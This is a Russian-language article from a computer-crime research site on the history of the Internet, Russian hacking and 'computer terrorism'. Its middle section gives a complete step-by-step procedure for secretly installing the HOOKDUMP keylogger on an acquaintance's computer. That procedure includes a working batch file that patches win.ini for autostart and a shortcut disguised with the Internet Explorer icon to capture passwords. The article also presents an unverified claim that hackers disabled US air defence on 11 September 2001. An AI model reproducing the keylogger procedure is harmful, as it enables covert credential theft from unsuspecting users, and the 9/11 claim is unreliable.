Computer Crime Problems Research Center

Кравченко А.В.,
начальник отделения Вычислительного центра
НИИТЦ ФПС России

Интернет и компьютерный терроризм

Интернет зарождался как новое средство передачи на большие расстояния американской военной информации, но со временем превратился в грандиозную систему по обмену информацией, широко распространенную во всем мире. Спецслужбы России, как и другие государственные учреждения и структуры, участвуют в Интернете, предоставляя миллионам пользователей сети узнать больше о данных структурах (помещаемые на сайтах сведения, естественно, не являются секретными).

Интернет создавался в 70-х годах как попытка связать компьютерную сеть Министерства обороны США ARPAnet (ARPA– сокращение “Агентства Передовых Исследовательских Проектов”) с сетями других государственных учреждений. Сама сеть являлась экспериментальной в военной области, целью ее развития являлась разработка способов передачи данных в условиях обширных перебоев с электроснабжением (модель ситуации ядерной войны).

Изначально предполагалось, что такую сеть не удастся уберечь от локальных повреждений, но она все равно будет функционировать, даже когда большая часть ее компьютеров выйдет из строя. Сеть ARPAnet разрабатывалась с таким расчетом, чтобы пересылаемая по ней информация “огибала” поврежденные или даже уничтоженные участки сети. Для этого каждый ее компьютер должен был уметь не только принимать данные (удаленный терминал), но и передавать их (сервер), что являлось отступлением от традиционно сложившейся жесткой иерархии в компьютерных сетях. Каждый кусочек или блок информации, передаваемой по Интернету, помещается в своего рода электронный “конверт”, на котором указан конечный адрес или место назначения.

У большинства спецслужб есть свои собственные компьютерные сети, закрытые от внешнего мира и охраняемые средствами безопасности. Так, существует параллельная “засекреченная” версия “всемирной паутины”, предназначенная для самых различных целей, начиная от рассылки разведывательных фотоснимков и заканчивая передачей информации дипломатам.

Трудно даже вообразить ущерб, который будет нанесен стране-хранителю подобной компьютерной информации, при нарушении ее целостности взломщиком-хакером. Добывание хакерами подобной информации, передача ее третьим лицам, сбои в работе закрытых компьютерных сетей и подобные нарушения составляют ядро компьютерного терроризма.

В настоящее время Россия переживает настоящий компьютерный бум, хотя и значительно отстает в этом от развитых зарубежных стран.

В России появление Интернета относится к августу 1990 года, когда сотрудник одного из Ленинградских совместных советско-финских предприятий Дмитрий Володин через своего финского партнера Петри Ойалу получил свой логин в университете Хельсинки. Сразу после этого западные газеты западные газеты запестрили сообщениями о том, что КГБ проник в Интернет. Там же, на Западе, многие просто не могли поверить в то, что в Советском Союзе есть компьютеры, подключенные к глобальной сети. Через месяц после первого подключения в том же Хельсинкском университете был зарегистрирован домен su (soviet union), ставший на 4 года официальным символом СССР в Интернет.

В 1994 году домен su был изменен на ru (Россия) и в конце того же года в России появляются первые хакеры.

Владимир Анатольевич Левин - первый и самый известный российский хакер. Его имя уже стало легендой и включено в список самых выдающихся хакеров мира.

Кто бы мог подумать, что обычный питерский инженер, закончивший факультет биотехнологий, сможет взломать казавшуюся неуязвимой систему защиты американского “Сити-банка”. Но Левин недооценил западных программистов, которые смогли вычислить нашего хакера всего за несколько месяцев.

По подсчетам “Сити-банка” хакер успел похитить всего лишь 400 тысяч долларов, сотрудники же ФБР утверждают, что сумма украденного составила более 10 миллионов. Владимир Левин отсидел 5 лет в американской тюрьме.

Однако для российского законодательства Владимир Левин был невиновен. В то время в России не существовало закона о компьютерных преступлениях.

Развитие сетевых-Internet технологий привело к развитию так называемой кибер-преступности. Появились такие понятия, как информационная безопасность и, более конкретно, сетевая безопасность. Успешная деятельность организаций, использующих достижения современных информационых технологий, зависит во многом от наличия специальных средств и квалифицированных кадров, занимающихся вопросами информационной безопасности.

Необходимость защиты от посягательств злоумышленников на служебные и информационные данные, а также своевременной реакции и оперативного восстановления поврежденных или несанкционированно измененных данных побуждает создавать специальные отделы по организации информационной безопасности и защите информации. Сотрудникам такого отдела предстоит решить следующие задачи защиты информации еще на предпроектном этапе подготовки системы защиты: разработать методику и дать оценку защищенности информационных потоков организации; исследовать программно-аппаратное обеспечение, и оценить степень защищенности информационных потоков и используемых технических средств.

Проектный этап представляет собой выявление информационных потоков, которые являются носителями секретной информации. Все транзакции, признанные секретными, защищаются в первую очередь. На их основе строится система защиты информации всей организации таким образом, что все служебные и секретные документы оказываются на самом “глубоком” – внутреннем уровне рубежей защиты. Ранжирование угрозы и применение эшелонированной защиты позволяет придать системе защиты немаловажное свойство масштабируемости.

Персонал, обеспечивающий необходимый уровень защищенности организации, должен иметь соответствующую подготовку и достаточное количество опыта многоплановых исследований для проведения подобных мероприятий. Привлеченные на постоянную работу специалисты, имеющие необходимый запас реального опыта работы, в таких условиях, к сожалению, быстро теряют свою квалификацию. В тоже время использование быстрых по времени инсталляции и введения в эксплуатацию (и порой довольно дорогих) готовых решений обычно имеет катастрофические последствия. Плохо обученный и незнакомый с чужой технической средой персонал может оказаться не способным обслуживать систему. Кроме того, готовое программно-аппаратное решение разрабатывается без учета особенностей взаимодействия отдельных компонент системы с пользователями конкретной организации и ее структурой. В результате, использование такого подхода не решает проблемы защиты информации для конкретной организации в полной мере. Вследствие этого, представляется разумным шагом привлекать к процессу сторонние организации, занимающиеся высококвалифицированной разработкой систем защиты, что называется “под ключ”. Это позволяет им сосредоточить свое внимание на аспектах информационной безопасности с профессиональной точки зрения. Результаты проведенной экспертизы позволят разработать оптимальную конфигурацию системы защиты информации и выработать общую для организации политику информационной безопасности. Это верно для любой организации, вступающей в сообщество пользователей глобальных и региональных корпоративных компьютерных сетей. Роль экспертов по информационной безопасности способны взять на себя ведомственные организации, которым проще провести юридическую аккомодацию разрабатываемых проектов и решений, получить лицензию и сертифицировать уже готовые разработки.

Необходимость в быстром реагировании на обстановку ставит любую организацию в зависимость от скорости получения оперативной информации и возможности дистанционного доступа к данным. Возможность быстрого доступа для большинства организаций является жизненно важной составляющей успешной деятельности. Существующие технологии размещения информационных серверов на базе локальных сетей представляют на сегодняшний день эффективное решение этой и некоторых других задач. Вместе с тем, построенная без учета возможности злоумышленного проникновения, аппаратно-программная база локальной сети является легкодоступной для проникновения, неправомочного доступа и нарушения работы, целью.

В связи с этой потенциальной угрозой, в состав обслуживающего персонала обязательно должны входить специалисты по обеспечению информационной безопасности. Они должны обеспечить установку и настройку соответствующего программно-аппаратного обеспечения по основным техническим направлениям обеспечения информационной безопасности.

Следует добавить, что помимо несанкционированного доступа к данным к компьютерному терроризму можно отнести и вирусы, распространяемые через глобальную сеть Интернет. Первый известный вирус, передаваемый через Интернет, появился в январе 1999 года и назывался HAPPY-99. Считается (хотя и не признано официально), что этот вирус, поразивший всю глобальную сеть, появился в России и был создан, чтобы получить доступ к паролям пользователей многих западных банков.

Однако для получения кодов и паролей пользователей нет острой необходимости проводить атаку через Интернет. Многие компьютерные террористы используют более простые и не менее надежные методы.

Не хотелось бы давать повод начинающим пользователям Интернет думать, что взлом частного Инернет-пароля является простым делом, однако чтобы установить программу-шпион на компьютер своего знакомого, имеющего доступ к сети, необходимо иметь заранее подготовленную дискету, обладать программой типа HOOKDUMP и получить доступ к его ПЭВМ хотя бы на 2-3 минуты.

Рассмотрим стандартную процедуру, которой пользуются взломщики, по сути являющиеся компьютерными террористами. На дискете необходимо создать папку, назвать "Hook" и дать ей атрибуты “скрытая” (hidden) и скачать туда все необходимые для взлома файлы.

К файлам для взлома относятся: Hookdump.exe, Hookdump.ini, Hookdmp.dll и другие. Взять данные программы можно практически на любом Инернет-сайте, дающем доступ к бесплатному программному обеспечению (www.freesoft.ru, www.freeware.ru и др).

Теперь, когда имеется все для взлома, надо все эти файлы переписать на жесткий диск пользователя. А потом, когда он перезагрузится, данная программа будет запущена автоматически. Можно создать bat-файл, который будет всё это делать сам. Причём этот файл нужно разместить на дискете в коренном каталоге.

Этот файл произвольно назовем hook.bat, пишется он в любом текстовом редакторе, например, в Notepad и имеет следующее содержание:

@echo off

copy a:\hook\hookd*.* c:\windows\*.*

copy c:\windows\win.ini a:\hook\win\*.txt

copy a:\hook\win\1.txt+a:\hook\win\win.txt a:\hook\win\win1.txt

del a:\hook\win\win.txt

ren a:\hook\win\win1.txt win.ini

copy a:\hook\win\win.ini c:\windows\*.*

del a:\hook\win\win.ini

@cls

Для того чтоб всё это сделал сам пользователь достаточно переместить этот файл в папку Hook и создать к нему ярлык, а ярлык поместить в коренной каталог. Потом поменять значок в ярлыке на значок Internet Explorer, который находиться (по умолчанию) в С:\Program Files\Internet Explorer\Iexplore.exe, а статистика показывает что 99% пользователей ставят все параметры по умолчанию, т.е. как предложит система.

И в дальнейшем этот шпион запишет всё, что набирается пользователем на клавиатуре компьютера (имена, пароли и т.д.).

После некоторого времени можно приходить и забирать все коды. Сделать это можно при помощи подобного bat-файла, текст которого приводить нет необходимости.

Сразу надо заметить, что подобная процедура может быть расценена как компьютерное преступление и преследуется по закону. Однако данное деяние является именно компьютерным терроризмом, поскольку может быть использована на любом компьютере, в том числе принадлежащем спецслужбам.

В связи с этим Министерство по связи и информатизации предложило правительству России внести в изменения в Уголовный кодекс РФ. Речь идет об отнесении компьютерного терроризма к разряду преступлений и установлении мер ответственности за него. Как сообщил заместитель руководителя департамента информатизации министерства И. Курносов, такое решение необходимо в связи с распространением случаев терроризма с использованием информационных и телекоммуникационных систем и сетей. Минсвязи также направило в правительство РФ предложение внести дополнения в федеральный закон "О борьбе с терроризмом" в части определения правовых и организационных основ борьбы с компьютерным терроризмом.

Будем надеяться, что данный закон будет принят. Иначе последствия компьютерного терроризма будут непредсказуемы. По неподтвержденным данным при атаке на крупнейшие города США – Нью-Йорк и Вашингтон - террористов-камикадзе 11 сентября 2001 года, система ПВО США была выведена из строя компьютерными хакерами, находящимися на службе террориста №1 в мире – Усамы бен Ладена.

Вероятно, это первый случай тесного сотрудничества террористов и компьютерных хакеров, приведший к огромному количеству человеческих жертв. После этого компьютерное пиратство должно быть полностью запрещено в Российской Федерации, вероятно, единственном государстве, где существуют официальные школы хакеров. Неизвестно, чем займется выпускник данной школы после ее окончания.

Остается только надеяться, что он отдаст все полученные знания как раз борьбе с компьютерным пиратством и компьютерным терроризмом. В противном случае, остается ожидать, что какой-нибудь компьютерный террорист-фанатик развяжет новую мировую войну.

И наконец можно отметить еще одно проявление компьютерного терроризма – угрозы, переданные через Интернет. В США в последнее время участились случаи угроз заражения сибирской язвой, передаваемые по электронной почте. Выявить отправителя, если он опытный хакер, практически невозможно. А в свете последних событий в США, к подобным угрозам относятся очень серьезно. По законам США компьютерный терроризм – одно из самых серьезных преступлений. ФБР объявило награду за поимку террористов-компьютерщиков, а самих террористов (в случае их поимки) ожидает длительное (до 25 лет) тюремное заключение.


Главная | Библиотека | Статьи | Форум
Ссылки | Команда | Контакты

Copyright © Центр исследования проблем компьютерной преступности, 2001-2002 Все права защищены.
При публикации информации взятой в нашем каталоге ссылка на http://www.crime-research.ru обязательна.